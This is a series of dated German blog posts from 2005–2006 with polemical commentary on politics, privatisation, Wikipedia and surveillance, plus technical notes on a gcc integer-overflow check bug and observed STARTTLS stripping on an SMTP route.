[l] Only in America: Ich clicke gerade bei tvguide.com herum, um mal das TV-Programm von heute zu sichten. Was sehe da? Auf Fox News um 5 gibt es "War Stories with Oliver North". Welcher Oliver North? Ja, DER Oliver North, der unter Reagan Iran Contra gemacht hat. Der, Wieso sitzt der nicht im Knast, fragt sich jetzt vielleicht der eine oder andere. Bei ihm hat die Eichmann-Defense funktioniert.

Sun May 7 2006

[l] Bushs Industrieförderung funktioniert so gut (das läuft in den USA alles über Militäraufträge), daß die Dienststelle, die Clearances ausstellt (also Erlaubnis, Informationen bis zu einer bestimmten Geheimhaltungsstufe sehen zu dürfen), hoffnungslos überfordert ist. Alleine zwischen Oktober und März sind da über 100000 Anträge eingegangen, und das Pentagon hat denen auch noch die Mittel gekürzt, und so haben die jetzt schlicht ganz zugemacht. Und was sagen sie der Presse dazu? "Hey, ihr könnt froh sein, daß wir die Anträge nicht alle weggeschmissen haben, wie wir kurz angedacht haben"

Tue Apr 25 2006

[l] Only in Malaysia: Schüler haben Hausaufgaben nicht gemacht, müssen zur Strafe Pornofilm gucken (Danke, Andreas)

Sun Apr 23 2006

[l] Zwei Professoren (Harvard und Uni Chicago) haben ein Paper über die Pro-Israel-Lobby gemacht, und sind natürlich sofort als Antisemiten verunglimpft worden, und der Druck besagter Lobby ging so weit, daß Harvard ihr offizielles Siegel von dem Paper zurückgezogen hat. Ich bin ja immer wieder schockiert, wie viele Leute Kritik an der Regierung Israels mit Antisemitismus gleichsetzen, auch Leute, die ansonsten gar nicht dämlich sind. Und wenn man sich das mal überlegt, … 30 UNO-Resolutionen gegen deren Politik, die nur durch US-Veto geblockt wurden, eine Jahrzehnte andauernde illegale Okkupation Palestinas, dann daß die damals das Atomkraftwerk im Irak zerbombt haben, ihr eigenes Atomprogramm, … es gibt wahrlich einfacherer Jobs als Pro-Israel-Lobbyist.

Mon Apr 17 2006

[l] Only Dorfrichter in America: Wells Fargo hat Kontoauszugdrucken outgesourced, und der Firma die Daten nicht verschlüsselt gegeben; ein Kunde klagte dagegen, und Wells Fargo bekam Recht. Warum? Weil der Subunternehmer ja nichts böses mit der Software gemacht hat, also hätte Wells Fargo sie auch nicht verschlüsseln müssen. WTF?!
[l] Ich habe ja schon ein paar gcc-Bugs in meinem Leben getriggert, aber das hier ist wirklich hart. Ich benutze in meiner täglichen Arbeit grundsätzlich die gcc-Version mit der höchsten Versionsnummer, damit meine selbst geschriebene Software auch damit zusammenarbeitet. Während ich an dem SMB-Code in gatling gearbeitet habe, fiel mir auf, wie häufig man in Netzwerk-Code die immer wieder gleichen Checks braucht, um zu gucken, ob ein gegebener Pointer überhaupt in dem reingekommenen Paket liegt, ob der String, der an Offset 15 beginnen soll, in dem Paket ist und 0-terminiert ist, sowas halt. Also habe ich mal ein paar Funktionen dazu zu Schreiben begonnen, und natürlich gleich mit Testsuite, die alle Fälle abdeckt. Hier ist eine dieser Funktionen:
```
int range_ptrinbuf(const void* buf,unsigned long len,const void* ptr) {
  register const char* c=(const char*)buf;
  return (c && c+len>c && (const char*)ptr-c<len);
}
```
und hier ist ein Test der Testsuite:
```
assert(range_ptrinbuf(buf,(unsigned long)-1,buf+1)==0);
```
Dieser Test übergibt einen Buffer, bei dem die Länge einen Integer-Overflow produziert. Genau für diesen Fall ist der c+len>c Teil in der Funktion da. Und was passiert zu meinem Entsetzen? Mit gcc 4.1 kompiliert akzeptiert meine Funktion diesen Buffer, und zwar mit oder ohne Optimizer. Mit dem alten gcc 3.4.5 geht es.
Wieso blogge ich das? Weil das genau der Code ist, mit dem man diese Art von Problem erkennt. Und es gibt viele Stellen, wo man diese Art von Problem erkennen will — im Linux-Kernel, in Samba, … Wenn ihr also euren Linux-Kernel mit gcc 4.1 kompiliert hat, oder Samba, dann wäre jetzt eine gute Gelegenheit, das noch mal mit gcc 3 zu kompilieren. An der Stelle vielleicht auch erwähnenswert: gut, daß ich gleich eine Testsuite gemacht habe für meine Funktionen! Testsuiten finden nicht nur Bugs in der eigentlichen Software, sondern auch in der Infrastruktur drum herum. Daher immer schön Testsuiten bauen! Ach ja, nur um das mal erwähnt zu haben: auch gcc hat eine Testsuite, und zwar nicht zu knapp. Ich bin ehrlich gesagt erschüttert, daß diese Art von Bug nicht von deren Testsuite gefunden wurde. Bug 27180.

Fri Apr 14 2006

[l] Klage gegen 11 Großbanken wegen "naked short selling". Short Selling heißt, daß ich Aktien verkaufe, die ich nicht besitze. Meine Bank oder mein Broker leiht mir diese Aktien daher solange. Ein paar Tage später gebe ich ihm Aktien zurück. Die kaufe ich aber erst dann. Ich spekuliere also darauf, daß die Aktien im Wert fallen werden, und ich sie, wenn ich sie ein paar Tage später kaufe, für weniger Geld kriege, als sie bei meinem Verkauf hatten.
In diesem Verfahren geht es jetzt darum, daß die Großbanken aus Short Sells Phantomtransaktionen gemacht haben sollen, indem sie mir zwar gesagt haben, sie hätten mir Aktien geliehen, und diese dann verkauft, aber das nicht wirklich getan haben. Der Kläger beschwert sich jetzt, daß die Banken Gebühren für nicht statt gefunden habende Transaktionen eingesackt haben.
Die eigentliche Beschwerde scheint wohl zu sein, daß die Banken untereinander deutlich nachsichtiger sind, wenn die Aktien dann nicht nachliefern, die sie geshorted haben.

Mon Apr 3 2006

[l] Venezuela holt sich zwei Ölfelder zurück (von Total und Eni), weil die Firmen nicht bereit waren, ihre Unternehmungen in Joint-Ventures mit der staatlichen Ölgesellschaft umzuwandeln, wo letztere die Mehrheit innehält. Die Ami-Ölgesellschaften und Shell und so sind offenbar alle umgekippt und haben das gemacht. Aber Frankreich und Italien glaubten offenbar, sie könnten da über ihre Regierungen Druck machen oder so.

Mon Mar 20 2006

[l] Wo ich gerade beim Meckern über Open Source Software bin: Was für Pfuscher haben eigentlich bei Firefox die Extension-Architektur gemacht, daß bei Version 2.0 die Extensions von Version 1.5 nicht mehr gehen!? ARGH!!!

Sun Mar 12 2006

[l] Saddam hat sich mehr Sorgen um interne Probleme gemacht als um die Amis, selbst als die US-Bomber schon gemacht. Daher hat er die Brücken nicht kaputt gemacht, weil er meinte, er müsse im Notfall die Armee zu den Schiiten schicken können, wenn die den Aufstand proben.
[l] Galactic Civilizations 2 ist ein PC-Spiel ohne Kopierschutz. Es ist auch nett zu spielen, und ich habe mir das gekauft, u.a. weil ich finde, daß Firmen belohnt gehören, die ihre Energie lieber in gute Produkte investieren als in Kopierschutz-Bullshit. Jetzt schreiben die Macher in ihrem Webforum, daß die Herstellerfirma von StarForce (einem der fiesesten Kopierschutz-Versuche da draußen; es gibt zahlreiche Berichte, daß deren Kopierschutz Systeme kaputt gemacht hat) in ihren Foren Torrents von Piratenkopien von Galciv2 veröffentlicht hat, damit bloß sonst keiner auf die Idee kommt, Spiele ohne Kopierschutz rauszubringen. Ich kaufe ja schon länger keine kopiergeschützten Spiele mehr, schließlich würde ich Leuten wie Starforce ja dann finanzieren, und das kommt überhaupt nicht in Frage.

Sat Mar 11 2006

[l] Die fiesen Krallen der Privatisierung zeigen sich ja überall. Ich bin natürlich mit der Bahn nach Hannover gefahren, das ist die sinnvollste Variante. Billig (ich habe eine Bahncard 50, da kostet das dann rund 25 Euro 2. Klasse), schnell (90 Minuten) und hinreichend bequem. Allerdings, bei näherer Betrachtung zeigen sich auch häßliche Details: Auf der Hinfahrt 20 Minuten Verspätung (weil auf der Strecke eine Störung in der Signaltechnik war, und außerdem hatte das Bordrestaurant kein Essen, weil da was ausgefallen war) und auf der Rückfahrt 15 Minuten Verspätung ("wegen der Witterung", und weil der Zug unvermittelt auch in Wolfsburg und Stendahl hielt… WTF!?). Und da mußte ich zurück denken, wie ich den Amis vorgeschwärmt hatte, was wir für ein tolles Bahnnetz haben. Wie auch bei vielen anderen Dingen helfen drei Monate USA-Aufenthalt deutlich, die Sachen mit ein bißchen Abstand zu betrachten. Die Bahn wird totgespart. Wir haben weniger Platz in den Zügen (insbesondere fürs Gepäck), erreichen weniger Ziele, und teurer geworden ist es auch noch (verglichen mit sagen wir 1980). Klar hat die Bahn damals Verlust gemacht — aber tut sie heute auch noch! Und zahlt noch nicht mal für die Schienen, und hat Deutschlands größtes zusammenhängendes Grundstück noch dazu geschenkt bekommen und muss da nichts für abzahlen. Ich kam dann ins Grübeln. Bei den Wasserwerken sieht es ja genau so aus. Die Investitionen in die Infrastruktur sind drastisch reduziert worden, der Service hat gelitten, die Preise sind gleichzeitig gestiegen. Genau so bei Strom. Und bei der Telekom auch, wenn man mal drüber nachdenkt. Gut, man zahlt heute nicht mehr viel Grundgebühr, aber hat man früher auch nicht. Teuer war die Grundgebühr nur direkt nach der Privatisierung. Es gibt eigentlich kein einziges Beispiel, wo Privatisierung nicht zu krasser Abzocke der Bürger geführt hat. Seufz. Und dann dieser Wahnsinn in Dresden mit dem Wohnungsverkauf, wo sich die Politiker noch nicht mal durchringen konnten, Neuverschuldung zu verbieten, nicht mal nur für ein paar Jahre, nachdem sie jetzt auf so fragwürdige Art und Weise "schuldenfrei" geworden sind.

Thu Feb 23 2006

[l] Cooler Quantenmechanik-Mindfuck. Über den Zeno-Effekt (I kid you not! Ich mußte spontan an Scientology denken, als ich das las) leitet man ein Photon in einen Computer ein, aber ohne es wirklich rein zu leiten. Aber über Quanteneffekte kann man an dem Photon draußen sehen, was der Computer damit gemacht hätte.
[l] "Bundesjustizministerin fordert besseren europäischen Patentschutz". Weil die EU-Staaten das ja doch nicht ratifizieren werden, was sich die EU-Kommission da gerade von Lobbyisten hat zusammentippen lassen, schlägt Zypries vor, doch einfach das Patentamt machen zu lassen. Wißt ihr was? Ich fordere auch etwas. Eine bessere Justizministerin. Wir haben ja schon viele wirklich schlimme Minister gehabt, aber was die SPD da an Karteileichen-Luschen installiert hat, das geht auf keine Kuhhaut. Die CDU hat zwar auch keine Ahnung, aber sie hat nicht so viel kaputt gemacht, nicht mal unter *dreikreuzemach* Kohl…

Wed Feb 22 2006

[l] Nachdem wir uns im Fnordrückblick über die Schutzmaßnahmen beim Iranischen Atomprogramm lustig gemacht haben, muss ich jetzt auch auf den fehlenden Mundschutz bei der Vogelgrippe-Entsorgung durch die 1-Euro-Jobler hinweisen. Und wo wir gerade auf die Arbeitsbedingungen der 1-Euro-Jobs hinweisen: da gibt es bestimmt sicherere Arbeitsplätze als den Einsatz als Streikbrecher gegen Ver.di

Tue Feb 21 2006

[l] Also ich werde mir ja immer weniger sicher, daß ich nach Deutschland zurück kommen will… Dieter "Rumsfeld" Wiefelspütz (wieso läuft DER eigentlich noch frei rum!?) schlägt ernsthaft vor, den Verteidigungsfall auszurufen, damit man doch die Bundeswehr im Inland gegen Terroristen einsetzen kann, nachdem das Verfassungsgericht ja Schily… äh Beckstein… äh nein Schäubles feuchte Träume kaputt gemacht hat. Ich fasse es nicht. Wißt ihr, was mich daran so fertig macht? Von hier aus der Ferne sieht Deutschland gerade genau so wie eine kriminelle Junta aus wie die USA aus Deutschland aussehen. Komplett mit der irrationalen Vogelgrippe-Hysterie, Gerüchten von Massenimpfungen, per Default abgenickten Abhöraktionen, von denen dann auch noch über die Statistiken nicht berichtet wird, während in der Presse Nebelkerzenberichterstattung von verschwundenen Kindern oder solchen in Tiefkühltruhen gemacht wird. Und dann zu wissen, daß es im Rest von Europa noch trüber aussieht… *Seufz*

Wed Feb 15 2006

[l] Der von Cheney angeschossene Anwalt hatte jetzt einen Herzinfarkt, nachdem ein Schrotkügelchen in sein Herz migriert ist. Die Daily Show gestern abend hat sich übrigens köstlich über die Angelegenheit lustig gemacht, da muss man echt Vergnügungssteuer erheben, so schön war das :-) Hier noch ein kleiner Nachschlag: Cheney hatte keinen Jagdschein und kriegt jetzt ein Knöllchen (Na gut, er hatte einen Jagdschein, aber der war nicht für diese Art Jagd freigeschaltet)

Wed Feb 8 2006

[l] Jetzt werden schon auf Security-Konferenzen vortragenden Security-"Experten" ihre Powerbooks aufgemacht. Ich könnte mich ja eh immer totlachen, wenn da ein Sicherheitsexperte Powerpoint aufmacht, oder MacOS bootet. Wie können diese Leute morgens in den Spiegel gucken?

Thu Feb 2 2006

[l] Hagalil ist gehackt worden. Das war die (jüdische) Site, die die Arabischen Karikaturen über den Terrorismus veröffentlicht hatten. Sehr schade. Hier ist ein Telepolis-Artikel darüber. Hat jemand einen Backup der Karikaturen gemacht?
[l] Hier einer für die technische Leserschaft: Wie TKÜV in der Praxis funktioniert, live beobachtet.
Wer das nicht versteht: die erste Route geht über ein direktes Peering zwischen Hetzner und Metabone. Die zweite Route geht über British Telecom, Cable und Wireless und Noris (aber alles anscheinend immer noch in Deutschland). Die erste Route zeigt eine typische Exim-SMTP-Meldung, die ankündigt, daß man gerne verschlüsselt mit dem Mailserver kommunizieren kann ("STARTTLS"). Die zweite Route hat das STARTTLS mit den Xen überschrieben und nimmt auch kein STARTTLS-Kommando an. Hier hat offensichtlich ein Mithör-Gerät entschieden, daß man das mitlesen möchte, und daß die lieber nicht auf SMTP-Ebene verschlüsseln sollen. Ziemlich krasse Sache. Und was lernen wir daraus? Immer auch noch mal mit PGP verschlüsseln. Das können sie dann zwar an der Zustellung hindern, aber nicht so einfach entschlüsseln.
Es gibt auf dem Markt auch transparente Spam- und Virenfilter, die ähnlich aussehen. Allerdings müssten die bei dem Server dann unabhängig von der Route anschlagen.
Ein Detail noch: wieso wird die Zeile mit STARTTLS nicht einfach gefiltert, anstatt sie auszuXen? Weil das ein TCP-Strom ist. Wenn man da die Datenmenge ändert, muss man den Datenstrom verfolgen und Offsets in Paketen anpassen. Das ist deutlich mehr Aufwand. Weil sie das so gemacht haben, ist daher klar, daß es sich nicht um einen Proxy handelt, denn der arbeitet eine Schicht höher und hätte keinen Vorteil aus diesem Vorgehen. (Danke, nibbler)

Wed Feb 1 2006

[l] Bayerns Methoden für den Umgang mit Gammelfleisch haben Schule gemacht: Kenia weist Angebot aus Neuseeland zurück, für die hungernden Kinder Hundetrockenfutter zu spenden. Jetzt kommt der Teil für die Numerologen: 42 Tonne Hundefutter! Und jetzt der Teil für die Hirnforscher: Die Frau meinte zur Presse, das Futter sei voller Nährstoffe und lecker, sie kippe sich selbst jeden Morgen ihr Trockenfutter ins Müsli. Na dann, guten Appetit! (Danke, Alex)

Sun Jan 29 2006

[l] Saudi Arabien boykottiert Milchprodukte aus Dänemark. Der Hintergrund ist, daß ein dänisches Kinderbuch keinen Grafiker gefunden hat, der ihnen Mohammed gemalt hätte, aus Angst vor extremistischen Anschlägen. Darüber hatte eine große dänische Tageszeitung berichtet, und da gleich 12 Bilder von Mohammed gebracht.

Fri Jan 20 2006

[l] Der größte Ebay-Händler hat pleite gemacht. Das alleine finde ich nicht so überraschend, weil Ebay-Händler und Seriosität bei mir geistig ein Widerspruch ist. Lustig an dem Fall ist aber, warum die pleite gemacht haben: die SAP-Einführung hat zu lange gedauert. Mich würde mal interessieren, ob SAP unter dem Strich wirklich mehr einspart als es kostet, wenn man mal über alle Firmen mittelt.

Thu Jan 19 2006

[l] Lacher des Tages: Die Illuminaten von dieser Wikipedia-Sekte haben unsere Business-Enzyklopädie gehackt!1!!. Die Site ist überhaupt großartig. Die haben auch als erste die Idee mit der Million Dollar Homepage gehabt, und dokumentieren da ausführlich, wie sie von den Wikipedianern verfolgt werden!1!! Update: Ich habe die Domain im Link kaputt gemacht; fügt ein . vor dem gs rein. Man hat mir versichert, daß es denen nur darum geht, künstlich ihren Pagerank zu erhöhen, um dann hier die Domain zu verkloppen.
[l] Soso, bei dem Bombenangriff auf das Dorf in Pakistan haben sie zwar nicht den erwischt, den sie wollten, aber dafür "den 52-jährigen Chemiewaffenexperten" von Al Kaida , der in Trainingslagern Hunderte im Umgang mit Sprengstoff und Chemiewaffen trainiert hat. Äh, wieso hat Al Kaida dann noch nicht einen Chemiewaffenangriff gemacht bisher? Bisher sind nur die Amis und die Briten tatsächlich mal beim Einsatz von Massenvernichtungswaffen erwischt worden. Für wie blöd halten die uns eigentlich?
[l] Moan ey, die Wikipedia geht mir ja nur noch auf den Sack in letzter Zeit. Jetzt haben sie www.wikipedia.de komplett abgeklemmt, und schieben das auf die Einstweilige Verfügung wegen Tron.
Ich habe da schon an anderer Stelle etwas zu gesagt, aber ich möchte auch hier meinem Unverständnis für das Gebaren der Wikipedia Ausdruck zu verleihen. Liebe Wikipedianer, ihr seid eine Webseite! Keine Enzyklopädie. Eine Webseite! Was ihr euch da intern für Maßstäbe für euren Inhalt ausgedacht habt, ist vollständig wurscht. Das ist eine Webseite, und unterliegt damit rein juristisch Regeln. Wenn ihr abgemahnt werdet von den Eltern, und ihr das Material dann nicht entfernt (und die Gründe dafür sind wirklich vollständig egal, und interessieren mich z.B. überhaupt rein gar nicht, also sowas von überhaupt nicht, das kann man mit Worten gar nicht ausdrücken), dann fangt ihr euch eine Einstweilige Verfügung ein. Jetzt hier tränendrüsendrückend eine Verfolgtenrolle herbeihalluzinierend unter Tränen www.wikipedia.de zuzumachen, und Trons Eltern die Schuld daran zu geben, das ist echt das allerletzte. Daß ihr sowas nötig habt! Meine Güte!
Aber ganz abgesehen von dieser Problematik, mit der Realität umzugehen, gibt es da auch noch die moralische Ebene. Wenn die Eltern eines Verstorbenen euch erlauben, den Artikel über Tron da zu lassen, solange ihr den Namen nicht erwähnt (und ich finde Tron ehrlich gesagt nicht so wichtig, daß er unbedingt in der Wikipedia einen Artikel haben muss), dann solltet ihr dankbar sein und den Familiennamen da rausnehmen und gut ist. Unabhängig davon ob ihr jetzt findet, daß die Recht haben oder nicht. Das versteht sich doch von selbst, daß man den Wünschen der Hinterbliebenen erstmal mit Respekt begegnet und folgt, und dann einvernehmlich einen Kompromiß sucht. Und was die Eltern euch angeboten haben, das war aus meinen Augen schon ein außerordentlich fairer Kompromiß. Manche Leute sind echt so sozial unfähig, daß man fast versucht ist, ihnen auch mal so einen Fall an den Hals zu wünschen, wo wildgewordene "Reporter" wie Burks ihre verstorbenen Verwandten in Büchern und Artikeln mit Schmutz bewerfen. Bei Leuten wie Burks gibt es ja keinen Grund, anderes Verhalten zu erwarten, aber Leute wie die Wikipedia-Jünger, die sich immer mit hehren ethischen Zielen umgarnen, daß solche Leute sich dann auch nicht besser verhalten als Burks, das finde ich wirklich schade. Wie können Leute, die so auf den Rechten anderer herumtrampeln, sich selbst auch noch für "die Guten" halten? Ist wie im echten Leben auch — nach der Revolution stellen sich die Revoluzzer als auch nicht besser als die Diktatoren vor ihnen heraus.

Wed Jan 18 2006

[l] War wohl doch noch nicht wirklich da, der Aufschwung in Japan: 300 Milliarden Dollar Kapital in einer Woche vernichtet an der japanischen Börse, und die Panik hat das Handelsvolumen so stark hochgetrieben, daß ihre Computer das nicht mitgemacht haben und sie mußten 20 Minuten vorher ausmachen. Das mit den Computern kann auch eine Ausrede sein. Am Aktienmarkt sind für die Spekulanten eigentlich nur die ersten und letzten paar Minuten am Tag wirklich wichtig. Vielleicht haben sie einfach verhindern wollen, daß da noch mehr Geld verloren geht. Au Backe.

Fri Jan 13 2006

[l] Steve Gibson hyperventiliert mal wieder. Das ist der Mann, der in Windows die Raw Sockets kaputt gemacht hat, indem er irgendwelche sinnfreien Weltuntergangsszenarien an die Wand gemalt hat. Ein Medien-Troll und ein Kook vor dem Herrn. Was man inhaltlich zur Beurteilung des Sachverhaltes wissen muss: Wine war auch anfällig. Also kann es keine Hintertür gewesen sein, oder die Illuminaten haben auch Wine gebackdoort!1!! Schönes Zitat von Slashdot: He's the L Ron Hubbard of the computer industry.
[l] Ich hab mal eine Logauswertung gemacht über blog.fefe.de, und das nimmt ja schon ziemlich beängstigende Ausmaße an gerade. Muß wohl mal zu einem Hoster mit Traffic-Flatrate wechseln :-) Wer es nicht kennt: solche Graphen macht man mit rrdtool (schönen Dank an Tobias Oetiker! Wenn man rrdtool einmal konfiguriert gekriegt hat, ist das ein echt cooles Tool)

Wed Jan 11 2006

[l] Only in England: Mann kriegt Knöllchen von Geschwindigkeitskamera — nicht weil er zu schnell gefahren ist, sondern weil er ein Victory-Zeichen in Richtung Kamera gemacht hat

Sun Jan 1 2006

[l] Und noch ein Rant zum neuen Jahr: Kameraüberwachung. Auch dazu habe ich mehrere Dinge zu sagen, vor allem weil ich mir gerade das Video der Podiumsdiskussion dazu vom 22c3 gezogen habe, und mich Padeluuns fundamentalistisches Gefasel furchtbar auf die Nerven geht.
Erstens: die Hauptverantwortung für gesellschaftliche Veränderungen haben meiner Ansicht nach nicht die Politiker, sondern die Sci-Fi-Autoren und die Techies. Die Sci-Fi-Autoren beschreiben ihre Visionen von zukünftigen Technologien und daraus resultierenden Gesellschaftsmodellen. Das lesen die Techies und entwickeln das dann. Ganz einfache Verhaltenskette. Die Politiker können nur machen, wofür die Technologien existieren. Und es besteht ja wohl kein Zweifel daran, daß wir in Zukunft alle vollständig überwacht werden. Selbst in Star Trek, der strahlenden Utopie unter den Sci-Fi-Universen, ist jederzeit von allen Personen feststellbar, wo sie sich gerade auf dem Schiff aufhalten. Und niemand findet etwas dabei! Kennt ihr jemanden, der Star Trek als Polizeistaat-Propaganda bezeichnen würde? Natürlich nicht! Alle sind sich im Grunde einig, daß es da hin geht. Alles andere ist in meinen Augen Selbstverarsche.
Dann heißt es immer, Kameras hätten so viele Nachteile, und das sei ein Polizeistaat. Sehe ich nicht so. Kameras haben im Gegenteil echte Vorteile. Man stelle sich mal folgendes vor: die Polizei kommt, gestern um 4 ist der Nachbar erschossen worden, sie wollen wissen, wo ich war. Ich war einkaufen. Da haben mich Hunderte gesehen, aber keiner wird sich an mich erinnern. Aber die Überwachungskamera hat mich gesehen und kann bestätigen, daß ich da war. Früher konnte man dann sein Alibi nicht beweisen und wurde anhand von Indizien verurteilt. Der einzige Nachteil wäre, wenn die Kamera die Daten nicht lange genug vorgehalten hat. Aber auch hier können wir uns an Star Trek orientieren. Dort haben sie eine Datenbank über jeden, die Jahre zurück reicht. So wird das bei uns auch sein, da bin ich mir sehr sicher. Und reden wir mal nicht vom Einkaufen, sondern von dem klassischen schlechten Alibi: "ich war zuhause und habe ein Buch gelesen". Auch das ist bisher nicht beweisbar, aber wenn vor und hinter dem Haus Kameras sind, kann man es beweisen!
Die gravierenste Kritik an Kameraüberwachung ist, daß sich das Verhalten ändert, wenn man weiß, daß man überwacht wird. Klingt plausibel, aber hält dem Praxistest nicht stand. Wir werden jetzt schon ständig überwacht im öffentlichen Nahverkehr und auf öffentlichen Plätzen. Mein Verhalten hat sich dadurch nicht geändert. Wenn sich überhaupt ein Verhalten ändert, dann bei unserer Generation, die das noch nicht gewohnt ist. Aber selbst das bestreite ich. Es ist bekannt, daß Emails, Instant Messages und Webclicken komplett abhörbar sind und auch flächendeckend abgehört wird. Hält das irgendjemanden vom Porno-Klicken ab? Was ich schon für Geschäftsgeheimnisse geemailt bekommen habe! Leute benutzen AOL oder MSN Instant-Messenger, wo man nicht nur weiß, daß das unverschlüsselt und abhörbar ist, sondern auch daß das durch Infrastruktur in den USA läuft! Und nicht irgendwelche Leute — Security-Consultants! Neulich rief mich einer auf dem Handy an, um mit mir etwas geheimes zu besprechen, was er mir nicht emailen wollte, weil ihm das nicht sicher genug war. Und Verträge und Trade Secrets werden auch gerne gefaxt, weil es zu unsicher ist, das am Telefon zu besprechen. Kurz gesagt: es gibt überhaupt keinen Hinweis darauf, daß Leute ihr Verhalten ändern, wenn ein bestimmtes, gewohntes Verhalten plötzlich als überwacht gelten muss. Die meisten Leute argumentieren dann, daß sie ja nichts interessantes gemacht hätten, und von all den Leuten, die sich über den Alexanderplatz bewegt haben an dem Tag, wieso würde man da ausgerechnet seine Daten weiterverarbeiten? Ist natürlich Blödsinn, man datamined natürlich alle Daten und filtert da nicht vor. Eine 400 GB Platte kostete mich neulich 200 Dollar. Es ist hanebüchen, da Platzprobleme anzunehmen. Guckt doch mal, was unser Staat in Systeme wie die Gesundheitskarte pumpt, und da gibt es weniger ROI.Der eigentliche Grund, wieso man sich wegen Videoüberwachung im Moment keine Sorgen machen muss, sollte allerdings auch genannt werden: es existieren noch keine Algorithmen zur Gesichtsextraktion aus Videobildern, die auch nur annähernd präzise genug ist, da ist man noch mehrere Größenordnungen von einer brauchbaren Fehlerrate entfernt. Ganz zu schweigen von der Problematik, überhaupt Pixelhaufen als Gesichter zu erkennen, inklusive Orientierung und Winkel, und zwei Gesichter nebeneinander an der richtigen Stelle auseinanderzuschnipseln. Ingo Lütkebohle hat einen prima Vortrag dazu auf dem 22c3 gehalten, hier gibt es die Videoaufzeichnung. Wer sich mal mit Computer Vision im Robotik-Umfeld beschäftigt hat, weiß um den Stand der Technik auf dem Gebiet. Im Moment muss man sich da noch gar keine Sorgen machen.

Fri Dec 30 2005

[l] Da sieht man mal, wie dringend den Regierungen das mit der Online-Sicherheit wirklich ist: "Cybercrime" soll 2004 mehr als 100 Milliarden Dollar Schaden gemacht haben, aber das Budget für die zuständige DHS-Abteilung wurde gerade auf 16 Mio Dollar gekürzt.
[l] Unser Just-In-Time Scheduling wird immer besser. Dieses Mal waren die Folien sage und schreibe 5 Minuten (!) vor dem Fnord-Rückblick fertig! Wenn das keine ökonomisch sinnvolle Minimierung von Leerlauf und Lagerraum ist, weiß ich auch nicht.
Wir hatten 75 Folien für 60 Minuten, und dachten uns, daß das wieder sehr voll werden würde (stimmte auch), und daß wir daher am Anfang ein bißchen Zeit fürs Rein- und Rausgehen und Komprimieren des Aufenthaltsraumes einplanen müssten, ergo später anfangen würden (war dann auch so, 5 Minuten), und sahen uns also schon gnadenlos überziehen. Dementsprechen machten wir nicht betont langsam (aber auch nicht überzogen schnell) unsere Folien durch, und waren dann um :45 durch. Oops. Aber das Publikum hat sich augenscheinlich gut amüsiert, und wir haben auch ganz fläschige drehende Multimedia-Slides mit krassen Übergängen und Effekten gemacht, haben uns sogar einen Titelsound komponieren lassen (fuck yeah, danke eRdgEiSt!), und so bin ich unter dem Strich sehr zufrieden. Und wir hätten ja noch mehr Material gemacht, das wir rausgeschmissen haben, weil wir dachten, wir überziehen so schon kraß! So kann man die Lage fehleinschätzen… Update: Ehre, wem Ehre gebührt: Antenne hat uns grafisch unter die Arme gegriffen

Tue Dec 27 2005

[l] Zwischenzeitlich gab es dann doch zwei-drei Internet-Überlastungen im WLAN, aber jetzt läuft es wieder. Offenbar war es die Backend-Infrastruktur hinter den APs, für die Session-Verwaltung oder sowas. Am Eingang hat Starbug gestern ein kleines Experiment gemacht und sich direkt hinter die Kasse gestellt, mit einem Tisch und einem Fingerabdrucksensor, und hat den frischen Gästen gesagt, sie müssten einen Fingerabdruck abgeben, wenn sie einfach so vorbei gingen. Knapp 40% der Gäste haben einen Fingerabdruck abgegeben! Krass. Man sollte denken, die Zielgruppe hier sei da sensibler.
[l] Ich sage das noch mal, weil es so ungewöhnlich ist: im Hackcenter funktioniert das Internet! Die Congress-Crew hat dieses Jahr das Experiment gewagt, das Netz von jemandem machen zu lassen, der sowas schon mal gemacht hat — Rop. All Hail Rop, saviour of the connectivity!!!

Mon Dec 19 2005

[l] Na ganz groß. Sie haben bei Firefox 1.5 Adblock kaputt gemacht. Hier gibt es ein funktionierendes adblock für Firefox 1.5
[l] Feindbild der Woche (aus aktuellem Anlaß): Leute, die Trolleys ins Handgepäck nehmen. Oh, und die Experten, die entschieden haben, daß Umsteiger aus internationalen Flügen, wenn sie in den Flughafenteil in Amsterdam wollen, mit dem man innerhalb der EU weiterfliegt, durch einen Metalldetektor müssen. Diese beiden, kombiniert mit Weihnachten, haben zu einer Security-Wartezeit von einer Stunde und 10 Minuten geführt. Dazu muss man 15 Minuten Zeit fürs Rumlatschen im Flughafen rechnen, und sich dann vor Augen halten, daß Amsterdam genau wie Heathrow zu dämlich ist, einem vorher das Gate zu sagen, und einem kommen die 1:30, die das Reisebüro mir für das Umsteigen in Amsterdam eingeräumt hatte, gar nicht mehr so großzügig bemessen vor. Und natürlich hat es sich Murphy nicht nehmen lassen, 80% der Anzeigetafeln ausfallen zu lassen, auf denen man das Gate nachgucken kann. Mit Windows-Dialogbox "Exception at 0xdeadbeef". Ganz großes Kino. Wenn ich es nicht so eilig gehabt hätte, hätte ich davon ein Foto gemacht. So war der Flug nach Berlin zu ungefähr 20% belegt, und konnte trotzdem nicht rechtzeitig starten, weil sie das Gepäck der Leute ausladen mußten, die es nicht geschafft haben, in 15 Minuten einmal durch den Flughafen zu rennen.

Wed Dec 14 2005

[l] Die Amis drängen auf ein Weltfreihandelsabkommen, weil die Welt ansonsten in Protektionismus versinken würde. Das sagen ausgerechnet die, die mit ihren Agrarsubventionen die Nachbarn im Süden plattgemacht haben, und mit ihren Holzzöllen die Kanadier um Milliarden betrogen haben.

Sun Dec 11 2005

[l] Auch MI6 hat Renditions gemacht

Thu Dec 8 2005

[l] Wir werden alle sterben: Fruchtbares Land alle. Naja, also alle ist was anderes, und es wird ja auch echt viel davon weggeschmissen. Das eigentliche Problem ist, daß wir dem Land mehr Essen entziehen, als es ohne Düngemittel hervorbringen könnte, und daß die Düngemittel alle aus Öl gemacht werden.

Sun Dec 4 2005

[l] Vielleicht nicht so ein Kaliber wie die Folterflüge, aber genau so ein Gefühl der Unantastbarkeit herrscht beim Arbeitsamt. Trotz angemahnter Verschwendung ihrer Mittel durch Auftragsvergabe an McKinsey und Roland Berger in den Jahren 2004 und 2005 haut das Arbeitsamt 2006 noch mehr Kohle hinterher
